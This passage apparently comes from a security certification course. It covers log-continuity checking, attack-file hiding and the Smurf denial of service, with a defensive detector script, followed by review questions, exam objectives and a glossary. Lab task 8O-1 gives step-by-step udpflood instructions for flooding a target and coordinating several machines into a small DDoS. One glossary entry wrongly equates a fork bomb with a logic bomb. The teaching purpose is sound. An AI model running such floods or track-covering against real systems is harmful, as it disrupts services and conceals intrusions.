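def parse_time(text):
    return datetime.strptime(text, "%Y-%m-%d %H:%M:%S")


def check_continuity(records):
    """Return (index, description) for every break in the record sequence."""
    findings = []
    prev_num = prev_time = None
    for idx, (num, when, event_id) in enumerate(records):
        stamp = parse_time(when)
        if event_id == AUDIT_LOG_CLEARED:
            findings.append((idx, f"audit log cleared (event {AUDIT_LOG_CLEARED})"))
        if prev_num is not None:
            if num <= prev_num:
                # A fresh .evt file always starts again at record 1.
                findings.append((idx, f"record numbering restarted: {prev_num} -> {num}"))
            elif num != prev_num + 1:
                # Records in between were collected from a different file.
                findings.append((idx, f"record numbers jumped: {prev_num} -> {num}"))
            if stamp < prev_time:
                findings.append((idx, f"timestamp moved backwards: {prev_time} -> {stamp}"))
        prev_num, prev_time = num, stamp
    return findings


if __name__ == "__main__":
    for idx, text in check_continuity(SAMPLE_RECORDS):
        print(f"record #{idx}: {text}")
```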

Hiding Attack Files

Another way that attackers can clean up after themselves is by hiding the files that they placed on the system. For instance, think back to the example of WandaB. To cover her tracks, she could change the properties of regedit.bat so that the file is hidden. Or, she could also rename the file to hide it from the real administrators.

Topic 8O
Performing a Denial of Service

Up to this point, the tools you have been using identify possible holes in the security of a system and the vulnerabilities of hosts. If the goal is not to gain access to a host, but only to disrupt access, then Denial of Service is required. By flooding the target, it becomes useless on the network.

The concept is similar to standing on a balcony during a press conference. Imagine being surrounded by 300 people, and 290 of them are just shouting out the word “Padding!” while the other 10 people are trying to ask legitimate questions. Do you think you would be able to properly respond to the 10 legitimate questions asked of you? Do you think you would even know that the questions were being asked?

A common technique for performing a DoS is Smurf. Smurf is a tool that takes a different approach to the normal DoS routine. A DoS would normally use default pings to overwhelm a given host. To really take up the resources a given target wants to use, the attacker would have to compromise many computers, and have them all ping the target at once.

The difference that Smurf provides is the ability to launch a DoS against a target with only a single computer. Smurf works by sending a ping packet to the broadcast address of a network, with a spoofed source IP address. The spoofed source IP address is that of the actual target. When the network clients respond to the ping packet, they will all send their replies to the spoofed address. The number of hosts involved in this attack is limited to the number of hosts that are active on the network.
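Seen from the amplifying network, the attack has two signatures: an echo request addressed to the directed-broadcast address, and a burst of echo replies leaving the network for a single outside host. The following Python detector over constructed packet summaries is an added example, not part of the course; the local network 192.0.2.0/24 and the packet list are constructed for it.

```python
"""Spot Smurf traffic in a packet summary.

Added example, not part of the course material. Given one-line packet
summaries (constructed below), it flags ICMP echo requests addressed to the
network's directed-broadcast address and reports which spoofed "source"
(the real target) the resulting flood of echo replies lands on.
"""
import ipaddress
from collections import Counter

ICMP_ECHO_REQUEST = 8
ICMP_ECHO_REPLY = 0

# Constructed: the local network the detector watches.
LOCAL_NET = ipaddress.ip_network("192.0.2.0/24")

# Constructed summaries: (src, dst, protocol, icmp type) as a sniffer prints them.
SAMPLE_PACKETS = [
    ("192.0.2.10", "192.0.2.20", "icmp", 8),     # ordinary ping between local hosts
    ("192.0.2.20", "192.0.2.10", "icmp", 0),
    ("198.51.100.7", "192.0.2.255", "icmp", 8),  # echo request to the broadcast address
    ("198.51.100.7", "192.0.2.255", "icmp", 8),  # (source is the spoofed victim)
    ("192.0.2.11", "198.51.100.7", "icmp", 0),   # every host answers the victim
    ("192.0.2.12", "198.51.100.7", "icmp", 0),
    ("192.0.2.13", "198.51.100.7", "icmp", 0),
    ("192.0.2.10", "203.0.113.5", "tcp", None),  # unrelated traffic
]


def is_amplifier_request(packet, net):
    """True for an echo request aimed at the network's directed-broadcast address.

    A border router that refuses to forward directed broadcasts (on Cisco IOS,
    `no ip directed-broadcast` on the interface) stops these from arriving at all.
    """
    src, dst, proto, icmp_type = packet
    if proto != "icmp" or icmp_type != ICMP_ECHO_REQUEST:
        return False
    return ipaddress.ip_address(dst) == net.broadcast_address


def smurf_report(packets, net, reply_threshold=3):
    """Correlate broadcast echo requests with the replies they trigger."""
    requests = [(src, dst) for (src, dst, proto, t) in packets
                if is_amplifier_request((src, dst, proto, t), net)]
    # In Smurf the request's source address is the victim, not the sender.
    spoofed_sources = sorted({src for src, _ in requests})

    # Count echo replies leaving the local network per outside destination.
    replies = Counter()
    for src, dst, proto, t in packets:
        if proto != "icmp" or t != ICMP_ECHO_REPLY:
            continue
        if ipaddress.ip_address(src) in net and ipaddress.ip_address(dst) not in net:
            replies[dst] += 1
    flooded = sorted(d for d, n in replies.items() if n >= reply_threshold)

    return {
        "amplifier_requests": requests,
        "spoofed_sources": spoofed_sources,
        "flooded_hosts": flooded,
        "confirmed_victims": sorted(set(spoofed_sources) & set(flooded)),
        "replies_per_destination": dict(replies),
    }


if __name__ == "__main__":
    for key, value in smurf_report(SAMPLE_PACKETS, LOCAL_NET).items():
        print(f"{key}: {value}")
```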


DoS attacks can run via multiple protocols, such as UDP and IP. Having the option to use multiple protocols increases the chance of getting past the firewall and being undetected by the Intrusion Detection System.

TASK 8O-1
Flooding with Udpflood

Setup: You are logged on to Windows 2000 as the renamed Administrator account.

1. Copy udpflood.exe from the location provided by your instructor to the root of your C drive. Unzip the file if it is zipped.

2. Open a Command Prompt, switch to the C drive, and enter udpflood to open the udpflood utility.

3. To target a machine, enter its IP address into the Destination field, and use a well-known port of your choice, such as 80.

4. Set Max Duration to 360 seconds and Max Packets to 999999.

5. Set Speed to 250 packets/second by sliding the bar all the way to the right.

6. Click Go when you are ready to start the flood. Observe the lights on the hubs/switches in class.

7. If you want to have a bigger impact on a machine, have several machines target the same host and then try to transfer a file to or from that target to another machine. If you are unable to complete this step, you will have performed a small-scale Distributed Denial of Service.

8. Close all open windows, and shut down the computer.

OOB Exploit

If a temporary DoS caused by a flood is not enough of a disruption to the attacker, that attacker might try to cause a target to reboot or otherwise crash. If that were the intent, the attack would now fall into the category of the Out Of Bounds (OOB) attack. You can cause an unpatched Windows system to hang (show the blue screen) by sending it a packet that is malformed in such a way that the TCP/IP stack of the machine doesn’t know how to react, so it responds by giving us one of the much feared BSODs (Blue Screens of Death).

Provide students with the location of the udpflood.exe file.


Summary

In this lesson, you looked at the general methodologies that a hacker might use to attack a target host. We detailed the concept of network reconnaissance and other means of gaining information about a potential target. We also investigated the issues surrounding network scanning, network sweeping, and port scanning, by using different tools and operating systems.

We identified common social engineering techniques, and identified common issues regarding Trojan Horse, virus, and worm programs. Finally, we took a look into some basic programming techniques.

Lesson Review

8A Describe some of the methods that an attacker can use to identify information about a potential target.

Responses might include newsgroup postings, email headers, Web sites, merger news, and Whois lookups.

8B What could a potential attacker learn by tracing a network?

The internal network configuration, including router names, router configurations, and Web and email server locations.

8C What is the primary reason for sweeping a network?

To identify the active hosts. These active hosts may then become the targets of the attacker.

8D What is the primary difference between a SYN scan and a full connect scan?

The SYN scan does not complete the connection between the two nodes, while the full connect scan completes the three-way handshake. The full connect is more likely to be caught by any Intrusion Detection Systems present on the network.

Why would an attacker perform stack fingerprinting on an IP address?

To identify the operating system type and version that is running on the target. If these are identified, then the attacker can focus on specific exploits for that system.

In addition to being able to determine which hosts are active on the target network and what ports they have open and listening, what else can nmap identify by matching TCP/IP signatures?

The operating system running on the host.


8E Which is more of a threat to a network: a virus, a Trojan Horse, or a worm?

It can be argued that all three are the highest threat. The virus may consume resources, such as DoS on the email system. The worm can be dangerous, since it can self-replicate through the network. The Trojan Horse can be a high threat in that if written cleverly, many people may execute it and spread it through the network. So, there is no one correct answer to this question, and if you identified this point, you are right!

8F How many ordinary, non-savvy users a day could a Web site such as Malweb trick into installing something other than a font?

Surprisingly, many! In this topic, you performed a task that an ordinary user in a typical corporate environment is tricked into doing almost on a daily basis. The connection is initiated by the user. Malicious Web sites are a major source of concern, as firewalls are typically configured to allow the user to initiate a connection to the Internet and not vice versa. If the user then downloads malicious programs in the form of spyware embedded in ads, games, or even so-called helpful similar software, then the user’s machine can be compromised.

8G True or False? Netcat can be used as a cross platform tool.

True.

8H Why are hardware keyboard loggers more dangerous than software loggers?

Because they are completely independent of the operating system.

8I What file in Windows NT stores the current list of user names and passwords?

The SAM.

What file in Linux stores the current list of user names and passwords?

/etc/passwd and /etc/shadow are both correct answers.

8J What is the weakness exploited by tools such as Snadboy?

The characters as typed are echoed on screen by a mask; Snadboy simply reveals what is under the mask.

8K What is a network’s primary defense against social engineering?

Education of the users of a network is the only true defense against social engineering. Each user should be instructed on how to respond to situations similar to those described in this topic. Social engineering is one of the toughest issues a network needs to defend itself against.

8L Why are Trojan Horse programs often small, simple games?

By using a simple game, the attacker can ensure the game will circulate the office quickly. If the game were hard or large, it would not work via email and not spread as quickly. The simple games are used specifically because they are simple.


8M What Windows NT file, if deleted or renamed, would grant access to the operating system with administrative privileges?

The SAM file.

8N What are the two common areas an attacker will work with to hide his or her tracks?

The log files and the audit policies.

8O How does Smurf perform a DoS?

Smurf spoofs the source IP address with that of the intended target’s IP address. Thus, all replies to ping would be directed to the target.


APPENDIX A
Hardening the Infrastructure Exam Objectives

Exam Objectives

Introduction

The Hardening the Infrastructure exam is designed to validate the foundation skills that a security professional requires. These skills include, but are not limited to, Router Security, Operating System Security, Advanced Knowledge of the TCP suite, and Network Security Basics.

Domains and Percentages

The Hardening the Infrastructure exam has 6 Domains. The percentages of each domain in the exam are defined in the following chart:

Examination Domain                              Percentage of Exam
1.0  Contingency Planning                                      5
2.0  Tools and Techniques                                      9
3.0  Security on the Internet and the WWW                     11
4.0  Router Security and ACLs                                 15
5.0  TCP/IP Packet Structure and Security                     25
6.0  Operating System Security                                35
Total                                                        100

Note: All percentages are approximate and subject to change at any time.

The Hardening the Infrastructure exam will be updated every year to ensure that candidates’ knowledge remains current and updated. In the event that significant changes are to be made at the yearly update, the Security Certified Program Web site will announce those modifications.

Mapping Exam Objectives to Course Content

The following table lists the test domains and objectives for the Hardening the Infrastructure examination, and where they are covered in this course.


Appendix A: Hardening the Infrastructure Exam Objectives 543


HTI Test Domains and Objectives / New Horizons Course Lessons and Topics

Domain 1.0: Contingency Planning (5%)

1.1. Fundamental Contingency Planning
  • Identify the Need for Contingency Planning
  • Describe Environmental and Technological Disasters
  • Examine the Impact of the Plan on Business
  Lessons and Topics: Lesson 6, Topic A

1.2. Creation of the Contingency Plan
  • Requirements of the Plan
  • Goals of the Plan
  • Testing the Plan
  Lessons and Topics: Lesson 6, Topic B

1.3. Technologies of Power
  • Personal UPS Devices
  • Server Room UPS Devices
  • Full Building Generators
  Lessons and Topics: Lesson 6, Topic C

1.4. Backing up the Operating System
  • Backup Strategies
  • Backing up Windows Systems
  • Backing up Linux Systems
  Lessons and Topics: Lesson 6, Topic D

Domain 2.0: Tools and Techniques (9%)

2.1. Perform Network Scanning and Discovery Methods
  • Network Reconnaissance: Lesson 8, Topic A
  • Network Scanning: Lesson 8, Topic D
  • Network Mapping: Lesson 8, Topic B

2.2. Describe Virii, Trojans, and Worms
  • Virus
  • Trojan Horse
  • Worm
  Lessons and Topics: Lesson 8, Topic E

2.3. Examine Social Engineering Techniques
  • Email Social Engineering
  • Telephone Social Engineering
  • Physical Social Engineering
  Lessons and Topics: Lesson 8, Topics K and L

2.4. Describe Privilege Escalation
  • Basic Programming Techniques
  • Gain Unauthorized Access
  Lessons and Topics: Lesson 8, Topic M

2.5. Examine the Process of Keystroke Logging
  • Hardware Keystroke Logging
  • Software Keystroke Logging
  Lessons and Topics: Lesson 8, Topic H

2.6. Examine the Concepts of DoS
  • Denial of Service
  • Distributed Denial of Service
  Lessons and Topics: Lesson 7, Topic C; Lesson 8, Topic O


2.7. Exploiting Password Weaknesses
  • Strong Password Design: Lesson 4, Topics B and C
  • Weak Password Design: Lesson 4, Topics B and C
  • Password Cracking Techniques: Lesson 8, Topics I and J

Domain 3.0: Security on the Internet and the WWW (11%)

3.1. Identify and Define the Weak Points in the Structure of the Internet
  • Tier System
  • DNS
  • ISPs
  • NAPs
  • Routers
  • Denial of Service
  Lessons and Topics: Lesson 7, Topics A and B

3.2. Define Web Site Attack Techniques
  • Poor Programming
  • Buffer Overflows
  • Vulnerability Scanning
  • IIS Vulnerabilities
  • Apache Vulnerabilities
  Lessons and Topics: Lesson 7, Topic C

3.3. Define Attack Techniques of Web Users
  • Email Attacks
  • Scripting Vulnerabilities
  • File Attachments
  • Cookie Misuse
  Lessons and Topics: Lesson 7, Topic D

3.4. Hardening Internet Access Points
  • Internet Explorer Browser Settings: Lesson 7, Topic D
  • IIS Patching and Hot Fixing: Lesson 7, Topic C
  • Apache Fundamental Security Settings: Lesson 7, Topic C
  • Securing Email Clients: Lesson 7, Topic D
  • Securing DNS Transfers: Lesson 7, Topic B

Domain 4.0: Router Security (15%)

4.1. Implementation of Fundamental Cisco Router Security
  • Cisco Authentication and Authorization
  • Implementation of Passwords
  • Implementation of Banners
  • Configuration of SSH
  • Verification of SSH
  Lessons and Topics: Lesson 5, Topic A


4.2. Describe the Routing Process
  • Describe the ARP Process
  • Describe the LAN to LAN Routing Process
  • Describe the LAN to WAN Routing Process
  • Examine Routing Protocols
  Lessons and Topics: Lesson 5, Topic B

4.3. Removing Unwanted Protocols and Services
  • Describe What Services to Remove
  • Configure the Removal of Unneeded Protocols
  • Configure the Removal of Unneeded Services
  Lessons and Topics: Lesson 5, Topic C

4.4. Creation and Implementation of Access Control Lists
  • Describe the Cisco ACL Process: Lesson 5, Topic D
  • Create Wildcard Masks: Lesson 5, Topic D
  • Implement Standard ACLs: Lesson 5, Topic E
  • Implement Extended ACLs: Lesson 5, Topic E
  • Implement ACLs to Defend Against Attacks: Lesson 5, Topic E

4.5. Configuring Cisco Router Logging
  • Describe Logging Options on a Cisco Router
  • Configure Buffered Logging
  • Configure Antispoofing Logging
  Lessons and Topics: Lesson 5, Topic F

Domain 5.0: TCP/IP Packet Structure and Security (25%)

5.1. Examine the Core Concepts of TCP/IP
  • Create a VLSM: Lesson 1, Topic A
  • Identify Protocols and their Corresponding OSI Layer: Lesson 1, Topic A
  • Describe Multi, Broad, and Uni-Casting: Lesson 1, Topic A
  • Examine Packet Capture and Analysis Tools: Lesson 1, Topic B
  • Analyze Packet Fragmentation: Lesson 1, Topic G

5.2. Identify and Describe Packet Headers
  • Describe the Structure of a Packet: Lesson 1, Topics C, D, E, and F
  • Identify and Describe the IP Header: Lesson 1, Topic C
  • Identify and Describe the ICMP Header: Lesson 1, Topic D
  • Identify and Describe the TCP Header: Lesson 1, Topic E
  • Identify and Describe the UDP Header: Lesson 1, Topic F


5.3. Examine the Session Setup and Teardown
  • Describe the TCP Lifecycle: Lesson 1, Topic B
  • Identify the Concepts of the Three-Way Handshake: Lesson 1, Topic B
  • Describe the Session Establishment Process: Lesson 1, Topic B
  • Describe the Session Teardown Process: Lesson 1, Topics B and H

5.4. Identify and Implement IPv6
  • Describe Benefits of IPv6 over IPv4
  • Identify IPv6 Addressing Schemes
  • Implementation of IPv6 on a Windows Client
  • Configuration and Use of IPv6 Utilities
  Lessons and Topics: Lesson 1, Topic I

Domain 6.0: Operating System Security (35%)

6.1. Windows 2000 Infrastructure Security
  • Describe Active Directory Components
  • Describe Group Policy
  • Creation of a GPO
  Lessons and Topics: Lesson 4, Topic A

6.2. Examine Windows 2000 Authentication
  • Describe LM Authentication
  • Describe NTLM Authentication
  • Describe and Configure NTLMv2 Authentication
  • Describe Kerberos in Windows 2000
  Lessons and Topics: Lesson 4, Topic B

6.3. Implement Windows 2000 Security Configuration Tools
  • Securing the Administrator Account
  • Configuring the Security Configuration and Analysis Tool
  • Implementing Security Templates
  • Creation of Security Templates
  • Using Secedit.exe
  Lessons and Topics: Lesson 4, Topic C

6.4. Configure Windows 2000 Resource Security
  • File and Folder Permissions in Windows 2000: Lesson 4, Topic D
  • Implement Windows 2000 Registry Security: Lesson 4, Topic D
  • Implement Windows 2000 Printer Security: Lesson 4, Topic D
  • Manage Services and SubSystems: Lesson 4, Topic D
  • Implement EFS: Lesson 4, Topic F

6.5. Windows 2000 Auditing and Logging
  • Enable Auditing in Windows 2000
  • Manage Event Logs
  • Security-related Event IDs
  • Audit Authentication Access
  Lessons and Topics: Lesson 4, Topic E


6.6. Windows 2000 Network Security
  • Examine NAT and Internet Connection Sharing
  • Describe the Routing and Remote Access Service
  • Examine the Internet Authentication Services
  • Implement a RADIUS System
  Lessons and Topics: Lesson 4, Topic G

6.7. Fundamental Linux Security
  • Configure File Permissions
  • Configure Directory Permissions
  • Managing the Password File
  • Managing the Shadow Password File
  Lessons and Topics: Lesson 3, Topic B

6.8. Securing SAMBA
  • Configuring SAMBA Key Files
  • Configuring the SAMBA Server
  • Configuring the SAMBA Client
  • Securing the SAMBA Connections
  Lessons and Topics: Lesson 3, Topic D

6.9. Network Configuration Security
  • Configuring NFS Servers
  • Configuring NFS Clients
  • Securing NFS
  • Configuring NIS
  • Securing NIS
  Lessons and Topics: Lesson 3, Topic D

6.10. Securing Linux
  • Remove Unused Services: Lesson 3, Topic E
  • Implement and Configure TCPWrappers: Lesson 3, Topic C
  • Implement and Configure Tripwire: Lesson 3, Topic E
  • Auditing and Logging on Linux: Lesson 3, Topic E
  • Implement and Configure Bastille: Lesson 3, Topic E


GLOSSARY

Administrative Security
The management constraints and supplemental controls established to provide an acceptable level of protection for defined resources.

AIS (Automated Information System)
Any equipment of an interconnected system or subsystem of equipment that is used in the automatic acquisition, storage, manipulation, control, display, transmission, or reception of data and includes software, firmware, and hardware.

alert
A formatted message describing a circumstance relevant to network security. Alerts are often derived from critical audit events.

ankle-biter
A person who aspires to be a hacker/cracker but has very limited knowledge or skills related to AISs. Usually associated with young teens who collect and use simple malicious programs obtained from the Internet.

Anomaly Detection Model
A model where intrusions are detected by looking for activity that is different from the user’s or system’s normal behavior.

Application Level Gateway (Firewall)
A firewall system in which service is provided by processes that maintain complete TCP connection state and sequencing. Application level firewalls often readdress traffic so that outgoing traffic appears to have originated from the firewall, rather than the internal host.

ASIM (Automated Security Incident Measurement)
Monitors network traffic and collects information on targeted unit networks by detecting unauthorized network activity.

assessment
An analysis of the vulnerabilities of an AIS. Information acquisition and review process designed to assist a customer to determine how best to use resources to protect information in systems.

assurance
A measure of confidence that the security features and architecture of an AIS accurately mediate and enforce the security policy.

attack
An attempt to bypass security controls on a computer. The attack may alter, release, or deny data. Whether an attack will succeed depends on the vulnerability of the computer system and the effectiveness of existing countermeasures.

audit
The independent examination of records and activities to ensure compliance with established controls, policy, and operational procedures, and to recommend any indicated changes in controls, policy, or procedures.

audit trail
In computer security systems, a chronological record of system resource usage. This includes user login, file access, other various activities, and whether any actual or attempted security violations occurred.

authenticate
To establish the validity of a claimed user or object.

authentication
To positively verify the identity of a user, device, or other entity in a computer system, often as a prerequisite to allowing access to resources in a system.


Glossary 549


Authentication Header
A field that immediately follows the IP header in an IP datagram and provides authentication and integrity checking for the datagram.

Automated Security Monitoring
All security features needed to provide an acceptable level of protection for hardware, software, and classified, sensitive, unclassified, or critical data, material, or processes.

availability
Assuring information and communications services will be ready for use when expected.

back door
A hole in the security of a computer system deliberately left in place by designers or maintainers. Synonymous with trap door; a hidden software or hardware mechanism used to circumvent security controls.

Bell-La Padula Security Model
Formal-state transition model of computer security policy that describes a formal set of access controls based on information sensitivity and subject authorizations.

Biba Integrity Model
A formal security model for the integrity of subjects and objects in a system.

bomb
A general synonym for crash, normally of software or operating system failures.

breach
The successful defeat of security controls which could result in a penetration of the system. A violation of controls of a particular information system such that information assets or system components are unduly exposed.

buffer overflow
This happens when more data is put into a buffer or holding area than the buffer can handle. This is due to a mismatch in processing rates between the producing and consuming processes. This can result in system crashes or the creation of a back door leading to system access.

bug
An unwanted and unintended property of a program or piece of hardware, especially one that causes it to malfunction.

C2
Command and Control.

C2-attack
Prevent effective C2 of adversary forces by denying information to, influencing, degrading, or destroying the data systems.

C2-protect
Maintain effective command and control of own forces by turning to friendly advantage or negating adversary effort to deny information to, influence, degrade, or destroy the friendly C2 system. (Pending approval in JP 1-02.)

C2W
Command and Control Warfare. The integrated use of operations security, military deception, psychological operations, electronic warfare, and physical destruction, mutually supported by intelligence, to deny information to, influence, degrade, or destroy adversary command and control capabilities, while protecting friendly command and control capabilities against such actions. Command and control warfare is an application of information operations in military operations and is a subset of information warfare.

CGI (Common Gateway Interface)
CGI is the method that Web servers use to allow interaction between servers and clients.

GLOSSARY

550 Hardening The Infrastructure (SCP)


Page 604: SCNP Hardening

CGI scripts
Allow for the creation of dynamic and interactive Web pages. They also tend to be the most vulnerable part of a Web server (besides the underlying host security).

Check_Password
A hacking program used for cracking VMS passwords.

Chernobyl Packet
Also called Kamikaze Packet. A network packet that induces a broadcast storm and network meltdown. Typically an IP Ethernet datagram that passes through a gateway with both source and destination Ethernet and IP address set as the respective broadcast addresses for the subnetworks being identical.

Circuit Level Gateway
One form of a firewall. Validates TCP and UDP sessions before opening a connection. Creates a handshake and, once that takes place, passes everything through until the session is terminated.

Clipper chip
A tamper-resistant VLSI chip designed by NSA for encrypting voice communications. It conforms to the Escrow Encryption Standard (EES) and implements the Skipjack encryption algorithm.

COAST
(Computer Operations, Audit, and Security Technology) A multiple project, multiple investigator laboratory in computer security research in the Computer Sciences Department at Purdue University. It functions with close ties to researchers and engineers in major companies and government agencies. Its research is focused on real-world needs and limitations, with a special focus on security for legacy.

compromise
An intrusion into a computer system where unauthorized disclosure, modification, or destruction of sensitive information may have occurred.

computer abuse
The willful or negligent unauthorized activity that affects the availability, confidentiality, or integrity of computer resources. Computer abuse includes fraud, embezzlement, theft, malicious damage, unauthorized use, denial of service, and misappropriation.

computer fraud
Misrepresentation or alteration of data in order to obtain something of value.

Computer Network Attack
Operations to disrupt, deny, degrade, or destroy information resident in computers and computer networks, or the computers and networks themselves. (DODD S-3600.1 of 9 Dec 1996)

computer security
Technological and managerial procedures applied to computer systems to ensure the availability, integrity, and confidentiality of information managed by the computer.

computer security incident
Any intrusion or attempted intrusion into an automated information system (AIS). Incidents can include probes of multiple computer systems.

computer security intrusion
Any event of unauthorized access or penetration to an automated information system (AIS).

confidentiality
Assuring information will be kept secret, with access limited to appropriate persons.


COPS
(Computer Oracle and Password System) A computer network monitoring system for UNIX machines. Software tool for checking security on shell scripts and C programs. Checks for security weaknesses and provides warnings.

COTS software
(Commercial Off the Shelf Software) Acquired by government contract through a commercial vendor. This software is a standard product, not developed by a vendor for a particular government project.

countermeasures
Action, device, procedure, technique, or other measure that reduces the vulnerability of an automated information system. Countermeasures that are aimed at specific threats and vulnerabilities involve more sophisticated techniques as well as activities traditionally perceived as security.

Crack
A popular hacking tool used to decode encrypted passwords. System administrators also use Crack to assess weak passwords by novice users in order to enhance the security of the AIS.

cracker
One who breaks security on an AIS.

cracking
The act of breaking into a computer system.

crash
A sudden, usually drastic failure of a computer system.

cryptanalysis
Definition 1: The analysis of a cryptographic system and/or its inputs and outputs to derive confidential variables and/or sensitive data including cleartext. Definition 2: Operations performed in converting encrypted messages to plaintext without initial knowledge of the crypto-algorithm and/or key employed in the encryption.

cryptographic hash function
A process that computes a value (referred to as a hashword) from a particular data unit in a manner such that, when the hashword is protected, manipulation of the data is difficult to achieve.

cryptography
The art or science concerning the principles, means, and methods for rendering plaintext unintelligible and for converting encrypted messages into intelligible form.

cryptology
The science which deals with hidden, disguised, or encrypted communications.

cyberspace
Describes the world of connected computers and the society that gathers around them. Commonly known as the Internet.

dark-side hacker
A criminal or malicious hacker.

DARPA
Defense Advanced Research Projects Agency.

data driven attack
A form of attack that is encoded in seemingly innocuous data which is executed by a user or a process to implement an attack. A data driven attack is a concern for firewalls, since it may get through the firewall in data form and launch an attack against a system behind the firewall.


defensive information operations
A process that integrates and coordinates policies and procedures, operations, personnel, and technology to protect information and defend information systems. Defensive information operations are conducted through information assurance, physical security, operations security, counter-deception, counter-psychological operations, counter-intelligence, electronic protect, and special information operations. Defensive information operations ensure timely, accurate, and relevant information access while denying adversaries the opportunity to exploit friendly information and information systems for their own purposes.

demon dialer
A program which repeatedly calls the same telephone number. This is benign and legitimate for access to a BBS but malicious when used as a denial of service attack.

Denial of Service
Action(s) which prevent any part of an AIS from functioning in accordance with its intended purpose.

derf
The act of exploiting a terminal which someone else has absent-mindedly left logged on.

DES
(Data Encryption Standard) Definition 1: An unclassified crypto algorithm adopted by the National Bureau of Standards for public use. Definition 2: A cryptographic algorithm for the protection of unclassified data, published in Federal Information Processing Standard (FIPS) 46. The DES, which was approved by the National Institute of Standards and Technology (NIST), is intended for public and government use.

DII
(Defense Information Infrastructure) The shared or interconnected system of computers, communications, data applications, security, people, training, and other support structures serving DoD local, national, and worldwide information needs. DII connects DoD mission support, command and control, and intelligence computers through voice, telecommunications, imagery, video, and multimedia services. It provides information processing and services to the subscribers over the Defense Information Systems Network and includes command and control, tactical, intelligence, and commercial communications systems used to transmit DoD information. (Pending)

DMZ
(Demilitarized Zone) A part of the network that is neither part of the internal network nor directly part of the Internet. Basically a network sitting between two networks.

DNS spoofing
Assuming the DNS name of another system by either corrupting the name service cache of a victim system, or by compromising a domain name server for a valid domain.

EA
(Electronic Attack) A division of EW involving the use of electromagnetic, directed energy, or antiradiation weapons to attack personnel, facilities, or equipment with the intent of degrading, neutralizing, or destroying enemy combat capability. EA includes actions taken to prevent or reduce an enemy's effective use of the electromagnetic spectrum, such as jamming and electromagnetic deception, and employment of weapons that use either electromagnetic or directed energy as their primary destructive mechanism.


EP
(Electronic Protection) A division of EW involving actions taken to protect personnel, facilities, and equipment from any effects of friendly or enemy employment of EW that degrade, neutralize, or destroy friendly combat capability.

ES
(Electronic Warfare Support) A division of EW involving actions tasked by, or under direct control of, an operational commander to search for, intercept, identify, and locate sources of intentional and unintentional radiated electromagnetic energy for the purpose of immediate threat recognition. Thus, electronic warfare support provides information required for immediate decisions involving EW operations and other tactical actions such as threat avoidance, targeting, and homing. ES data can be used to produce signals intelligence.

ESP
(Encapsulating Security Payload) A mechanism to provide confidentiality and integrity protection to IP datagrams.

Ethernet sniffing
Listening with software to the Ethernet interface for packets that interest the user. When the software sees a packet that fits certain criteria, it logs it to a file. The most common criterion for an interesting packet is one that contains words like login or password.

EW
(Electronic Warfare) Any military action involving the use of electromagnetic and directed energy to control the electromagnetic spectrum or to attack the enemy. The three major subdivisions within electronic warfare are electronic attack, electronic protection, and electronic warfare support.

false negative
Occurs when an actual intrusive action has occurred but the system allows it to pass as non-intrusive behavior.

false positive
Occurs when the system classifies an action as anomalous (a possible intrusion) when it is a legitimate action.

fault tolerance
The ability of a system or component to continue normal operation despite the presence of hardware or software faults.

firewall
A system or combination of systems that enforces a boundary between two or more networks. A gateway that limits access between networks in accordance with local security policy. The typical firewall is an inexpensive micro-based UNIX box kept clean of critical data, with many modems and public network ports on it, but just one carefully watched connection back to the rest of the cluster.

fishbowl
To contain, isolate, and monitor an unauthorized user within a system in order to gain information about the user.

Fork Bomb
Also known as Logic Bomb. Code that can be written in one line of code on any UNIX system, used to recursively spawn copies of itself. Eventually "explodes," eating all the process table entries and effectively locking up the system.

hacker
A malicious or inquisitive meddler who tries to discover information by poking around. A person who enjoys learning the details of programming systems and how to stretch their capabilities, as opposed to most users who prefer to learn the necessary minimum.


hacking
Unauthorized use, or attempts to circumvent or bypass the security mechanisms of an information system or network.

hacking run
A hack session extended long outside normal working times, especially one longer than 12 hours.

host
A single computer or workstation; it can be connected to a network.

host based
Information, such as audit data from a single host, which may be used to detect intrusions.

IA
(Information Assurance) Information Operations that protect and defend information and information systems by ensuring their availability, integrity, authentication, confidentiality, and non-repudiation. This includes providing for restoration of information systems by incorporating protection, detection, and reaction capabilities. (DODD S-3600.1 of 9 Dec 1996)

IDEA
(International Data Encryption Algorithm) A private key encryption-decryption algorithm that uses a key that is twice the length of a DES key.

IDIOT
(Intrusion Detection In Our Time) A system that detects intrusions using pattern-matching.

information security
The result of any system of policies and/or procedures for identifying, controlling, and protecting from unauthorized disclosure, information whose protection is authorized by executive order or statute.

information superiority
The capability to collect, process, and disseminate an uninterrupted flow of information while exploiting or denying an adversary's ability to do the same. (DODD S-3600.1 of 9 Dec 1996)

integrity
Assuring information will not be accidentally or maliciously altered or destroyed.

Internet worm
A worm program (see: worm) that was unleashed on the Internet in 1988. It was written by Robert T. Morris as an experiment that got out of hand.

intrusion
Any set of actions that attempts to compromise the integrity, confidentiality, or availability of a resource.

intrusion detection
Pertaining to techniques which attempt to detect intrusion into a computer or network by observation of actions, security logs, or audit data. Detection of break-ins or attempts, either manually or via software expert systems that operate on logs or other information available.

IO
(Information Operations) Actions taken to affect adversary information and information systems while defending one's own information and information systems. (DODD S-3600.1 of 9 Dec 96)

IP splicing/hijacking
An action whereby an active, established session is intercepted and co-opted by the unauthorized user. IP splicing attacks may occur after an authentication has been made, permitting the attacker to assume the role of an already authorized user. Primary protections against IP splicing rely on encryption at the session or network layer.


IP spoofing
An attack whereby a system attempts to illicitly impersonate another system by using its IP network address.

IW
(Information Warfare) Information Operations conducted during a time of crisis or conflict to achieve or promote specific objectives over a specific adversary or adversaries. (DODD S-3600.1 of 9 Dec 1996)

key
A symbol or sequence of symbols (or electrical or mechanical correlates of symbols) applied to text in order to encrypt or decrypt.

key escrow
The system of giving a piece of a key to each of a certain number of trustees such that the key can be recovered with the collaboration of all the trustees.

keystroke monitoring
A specialized form of audit trail software, or a specially designed device, that records every key struck by a user and every character of the response that the AIS returns to a user system.

LAN
(Local Area Network) A computer communications system limited to no more than a few miles and using high-speed connections (2 to 100 megabits per second). A short-haul communications system that connects ADP devices in a building or group of buildings within a few square kilometers, including workstations, front-end processors, controllers, and servers.

leapfrog attack
Use of user ID and password information obtained illicitly from one host to compromise another host. The act of TELNETing through one or more hosts in order to preclude a trace (a standard cracker procedure).

letterbomb
A piece of email containing live data intended to do malicious things to the recipient's machine or terminal. Under UNIX, a letterbomb can also try to get part of its contents interpreted as a shell command to the mailer. The results of this could range from amusing to denial of service.

Logic Bomb
